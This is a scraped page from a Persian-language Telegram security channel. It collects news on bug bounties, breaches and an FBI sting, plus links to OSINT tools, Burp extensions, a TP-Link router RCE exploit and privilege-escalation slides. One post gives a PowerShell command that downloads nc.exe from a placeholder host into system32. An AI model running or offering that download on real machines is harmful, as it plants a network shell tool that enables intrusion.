امنیت اطلاعات
@sec_nerd
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
About
Blog
Apps
Platform
Join
امنیت اطلاعات
847 subscribers
امنیت اطلاعات
فیسبوک از هکرها خواست برای کشف آسیب پذیری در محصولات این شرکت شامل فیسبوک، اینستاگرام، واتس اپ و oculus تلاش کنند و جایزه دریافت نمایند.
فیسبوک با افزایش جوایز خود، آنها را به دو دسته تقسیم کرده است.
در دسته اول ۲۵ هزار دلار به باگی پرداخت میشود که نیاز به دخالت کاربر در آن وجود داشته باشد و ۴۰ هزار دلار نیز به باگهایی اعطا میشود که نیاز به دخالت کاربر در آنها وجود نداشته باشد.


منبع:
https://www.hackread.com/facebook-bug-bounty-hacking-facebook-instagram-whatsapp/


#facebook
#news
#bugbounty
#whatsapp
#instagram

@sec_nerd
HackRead
Bug Bounty: Earn $40,000 for hacking Facebook, Instagram or WhatsApp
Got skills?
321 views
امنیت اطلاعات
دستورات کاربردی ویندوزی برای مهاجمان
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

#windows
#cmd


@sec_nerd
JPCERT/CC Eyes
Windows Commands Abused by Attackers - JPCERT/CC Eyes
Hello again, this is Shusei Tomonaga from the Analysis Center. In Windows OS, various commands (hereafter “Windows commands”) are installed by default. However, what is actually used by general users is just a small part of it. On the other...
294 views
امنیت اطلاعات
امنیت اطلاعات
شکست در سرقت ATM با متد خاص نفوذ! (اخیرا دلیر مردانی از کشورمون با موفقیت این کار رو انجام دادن!) #fun @sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
#udpate
#lone_wolf
#atm


@sec_nerd
341 views
امنیت اطلاعات
امنیت اطلاعات
فایرفاکس کوانتوم به کاربران در خصوص وب سایتهایی که اخیرا قربانی حملات هکرها بوده اند هشدار میدهد! https://blog.mozilla.org/press-uk/2018/11/15/firefox-monitor-launches-in-26-languages-and-adds-new-desktop-browser-feature/ #firefox #breach @sec_nerd
#firefox

@sec_nerd
338 views
امنیت اطلاعات
Online #OSINT CheckList [Reconnaissance] :

* Dnstrails - Best for enumerating Subdomains
* Viewdns.info - Various tools [Finding Origin IP behind Cloudflare, and so on) - Recommended
* Google ASE aka Google Dorking
* Pentest-tools
* Dumpster
* VirusTotal
* Crt.sh - Best for enumerating related domains
* Dnsgoodies


#security #infosec #bugbounty #enumeration #pentest #redteam #cybersecurity


@sec_nerd
327 views
امنیت اطلاعات
ابزار trape برای جمع آوری اطلاعات از اشخاص در اینترنت

https://github.com/jofpin/trape


#osint
#enum

@sec_nerd
367 views
امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
پس از سقوط ارزش بیت کوین به زیر ۴ هزار دلار، چینی ها دستگاه های ماینر خود را به حراج گذاشته اند!

https://twitter.com/DoveyWan/status/1066678209679249408


#btc
#news
#china


@sec_nerd
295 views
امنیت اطلاعات
لیستی از افزونه های کاربردی burpsuite:

تست نفوذ اپلیکیشن های NET. :
https://github.com/allfro/dotNetBeautifier

Java Deserialization Scanner:
https://github.com/federicodotta/Java-Deserialization-Scanner


Java Serial Killer:
https://github.com/NetSPI/JavaSerialKiller


و ادامه لیست در لینک زیر:
https://github.com/snoopysecurity/awesome-burp-extensions



#burpsuite
#web
#pentest


@sec_nerd
GitHub
allfro/dotNetBeautifier
A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE). - allfro/dotNetBeautifier
391 views
امنیت اطلاعات
دزد هم باید رک و پوست کنده حرفشو بزنه 😂😂


#fun
#social_engineering


@sec_nerd
266 views
امنیت اطلاعات
#iot
#fun

@sec_nerd
264 views
امنیت اطلاعات
#GOT
#fun
#linux


@sec_nerd
351 views
امنیت اطلاعات
#fun

@sec_nerd
270 views
امنیت اطلاعات
دانلود فایل با استفاده از پاورشل (معادل wget در لینوکس)

Invoke-WebRequest "https://domain.tld/nc.exe" -OutFile "C:\\windows\\system32\\nc.exe"


#windows
#ps


@sec_nerd
321 views
امنیت اطلاعات
ظاهر جدید وبسایت https://www.exploit-db.com/


#news
#exploit-db

@sec_nerd
265 views
امنیت اطلاعات
شرکت uber بخاطر ناتوانی در محافظت از اطلاعات مشتریانش توسط دیدبان حریم شخصی بریتانیا به میزان ۴۹۱ هزار دلار جریمه شد.
این جریمه بخاطر هک شدن اوبر در سال ۲۰۱۶ و دزدیده شدن اطلاعات حدود 2.7 میلیون کاربر بریتانیایی اعمال شده است.


منبع:
https://www.engadget.com/2018/11/27/uber-ico-uk-fine-cyber-attack/

#news
#uber
#breach
#uk


@sec_nerd
Engadget
Uber fined £385,000 in the UK for 2016 cyber-attack
Around 2.7 million UK users were affected by the breach.
252 views
امنیت اطلاعات
پلیس فدرال امریکا (FBI) برای به دام انداختن اسکمرها دست به ساخت وبسایت جعلی fedEx زد (fedEx یک سرویس ارسال محموله های پستی است)
این اسکمرها وانمود میکردند که فرد قابل اعتمادی هستند و شرکتها را مجاب به ارسال مبالغ بالا میکردند.در این عملیات FBI با ساخت این وبسایت و همچنین ایجاد داکیومنت های آلوده ی آفیس که منجر به برملا شدن آی پی اصلی مجرمان میشد، موفق به یافتن مکان آنان شد.
پلیس ها آدرس وبسایت جعلی را به مجرمان دادند، آنها همچنین خطایی را در وبسایت برای کاربرانی که از پروکسی استفاده میکنند به نمایش درآوردند. ابتدا آی پی های متعددی به وبسایت متصل شدند که برخی از آنها نیز از پروکسی استفاده میکردند. پلیس برای مشخص شدن آی پی ها از روش بازرسی شبکه (NIT) بهره برد و با کمک داکیومنتهای ورد توانست آی پی اصلی مجرمان را بدست آورد.



اطلاعات بیشتر:
https://motherboard.vice.com/en_us/article/d3b3xk/the-fbi-created-a-fake-fedex-website-to-unmask-a-cybercriminal

#news
#usa
#fbi
#scam

@sec_nerd
Vice
The FBI Created a Fake FedEx Website to Unmask a Cybercriminal
In an attempt to identify someone tricking a company into handing over cash, the FBI created a fake FedEx website, as well as deployed booby-trapped Word documents to reveal fraudsters' IP addresses.
263 views
امنیت اطلاعات
تست نفوذ دستگاههای صنعتی (PLC)

https://medium.com/tenable-techblog/plc-bug-hunt-fa3a0aeae9ab


#scada
#pentest

@sec_nerd
428 views
امنیت اطلاعات
اکسپلویت اجرای دستور از راه دور بر روی روتر TP-Link Archer C5
(CVE-2018-19537)

https://github.com/JackDoan/TP-Link-ArcherC5-RCE/


#exploit
#network
#rce
#tplink


@sec_nerd
GitHub
GitHub - JackDoan/TP-Link-ArcherC5-RCE: CVE-2018-19537
CVE-2018-19537. Contribute to JackDoan/TP-Link-ArcherC5-RCE development by creating an account on GitHub.
288 views
امنیت اطلاعات
رایت آپ
از آپلود داکیومنت word تا stored xss

https://www.coalfire.com/The-Coalfire-Blog/May-2018/Microsoft-Word-Document-Upload-to-Stored-XSS


#writeup
#office
#web
#pentest
#xss
#bugbounty

@sec_nerd
316 views
امنیت اطلاعات
وبسایت sci-hub که مقالات علمی را بصورت رایگان در اختیار دانشجویان و محققان قرار میدهد متعلق به خانم Alexandra Elbakyan قزاقستانی است.
او فارق التحصیل دانشگاه آلماتی است و در آنجا به هک علاقمند شد. او از پرداخت پول برای مقالاتی که به آنها نیاز داشت خسته شده بود و با توانمندیهای خود در هک، توانست مقالات را برای خود و همکلاسی هایش بصورت رایگان فراهم کند.
او در مسکو، آلمان و جورجیا امریکا نیز کار کرد و در سال ۲۰۱۱ به کشورش برگشت. با دیدن نیاز افراد به مقالات در طی این سالها، تصمیم به راه اندازی وبسایت sci-hub گرفت که در سال ۲۰۱۵ بیش از ۴۲ میلیون دانلود در آن ثبت شد.
او هم اکنون در مکانی نامعلوم در مقطع کارشناسی ارشد در حال تحصیل است.
او توسط امریکا تحت تعقیب است اما روسیه هیچ متهمی را به امریکا تحویل نمیدهد!


الکساندرا اکنون سی سال دارد و دامنه جدید وی پس از حذف شدن دامنه های پیشین، از آدرس https://sci-hub.tw/ قابل دستیابی است.


https://hackaday.com/2018/11/27/sci-hub-breaking-down-the-paywalls/



@sec_nerd
411 viewsedited  
امنیت اطلاعات
RomHack_2018_Andrea_Pierini_whoami.pdf
2.2 MB
راهکارهایی برای افزایش سطح دسترسی به SYSTEM در سیستم های ویندزوی

#windows
#privesc


@sec_nerd
359 views